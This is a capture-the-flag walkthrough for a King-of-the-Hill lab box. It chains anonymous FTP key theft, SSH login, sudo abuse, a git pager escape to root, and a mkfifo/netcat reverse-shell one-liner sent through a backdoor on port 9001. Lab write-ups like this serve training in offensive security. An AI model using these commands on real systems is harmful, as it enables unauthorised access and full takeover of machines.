KoTH Production
Let's search for Open Ports via Nmap:
nmap -sC -sV -oN nmap/initial
We can see anonymous
login enabled for ftp
Let's login Then (:
We get id-rsa of a user, if we get the public key too, and cat that out we can see the id_rsa was of user ashu
Login via user Ashu
First you need to give the id_rsa read,write permissions using
chmod 600 id_rsa
Let's login-
ssh -i id_rsa ashu@
Getting root via user ashu
Let's check for sudo abilities for ashu
sudo -l
We see, we can just directly switch to user skidy
with sudo-
sudo su skidy
Now, before priv-esc, if we try to look into the home directory of user skidy
, we will find a
directory named homework
, and in there there's a python script server1.py
, if you cat that
you'll find the password you need to enter to access the backdoor on port 9001
Let's check for the sudo abilities of user skidy
We see /usr/bin/git there, let's check its gtfo-bins page
After doing-
sudo git -p help config
we can type !/bin/bash
to get root
Getting Root via port 9001, 9002
nc 9001
It is a backdoor for user ashu...
put the pass we found in the python script in the home directory of user skidy y......!
On port 9001, do-
echo "#!/bin/bash\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 8888 >/tmp/f" > /tmp/a; chmod +x /tmp/a
Now, let's use port 9002
to get a rev-shell on the port we put above-
nc 9002
to get a rev-shell on port 8888
, start a netcat listener on your machine
nc -lnvp 8888
NOW on port 9002, run the command-
Yep, we got our shell as root (:
Thanks For Reading <3